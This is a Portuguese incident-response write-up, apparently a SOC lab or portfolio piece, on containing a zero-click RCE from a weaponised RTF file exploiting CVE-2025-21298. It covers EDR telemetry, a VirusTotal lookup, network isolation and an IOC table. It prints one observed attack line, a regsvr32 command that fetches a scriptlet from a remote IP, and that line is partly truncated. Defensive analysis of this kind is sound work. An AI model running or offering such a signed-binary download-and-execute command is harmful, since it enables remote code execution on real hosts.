
Investigação técnica e contenção de host de um exploit RCE Zero-Click de severidade Crítica (CVE-2025-21298) usando telemetria do EDR e análise estática de malware.
Este projeto documenta a investigação e contenção de ponta a ponta de uma tentativa de Execução Remota de Código (RCE) de gravidade Crítica e Zero-Click. Usando telemetria EDR e inteligência de ameaças, identifiquei um ataque "Living off the Land" (LotL) que contornou as defesas automatizadas e estabeleceu comunicação de comando e controle (C2).
Identifiquei o Event ID 314: Detecção de RCE Zero-Click do Windows OLE. A telemetria inicial revelou que o arquivo malicioso mail.rtf foi Permitido pelas defesas de perímetro, indicando um comprometimento ativo na estação de trabalho 'Austin'.

Realizei uma verificação de reputação do hash do arquivo no VirusTotal. Os resultados confirmaram uma taxa de detecção de 25/55, identificando especificamente o arquivo como um RTF armamentado utilizando CVE-2025-21298. Esta vulnerabilidade permite a execução remota de código através do Painel de Visualização do Windows sem interação do usuário.

Mudei para o histórico do terminal EDR do host 'Austin' para identificar o comportamento pós-exploração. Descobri uma execução maliciosa "Living off the Land" (LotL):
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe) para buscar um script-let malicioso de um servidor remoto, contornando a lista de permissões de aplicativos padrão e as assinaturas tradicionais de AV.

Seguindo o Framework de Resposta a Incidentes do NIST, a contenção imediata foi priorizada. Executei um Isolamento de Rede no host afetado para encerrar a comunicação C2 e evitar o movimento lateral dentro da rede corporativa.

O incidente foi encerrado como um Verdadeiro Positivo. Documentei o IP do Atacante (84.38.130.118) e as evidências forenses para as equipes de Inteligência de Ameaças e Firewall para prevenir ocorrências futuras.

| Tipo | Valor |
|---|
| Endereço IP C2 | 84.38.130.118 |
| Hash do Arquivo (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| Vulnerabilidade | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - Signed Binary Proxy Execution: Regsvr32 |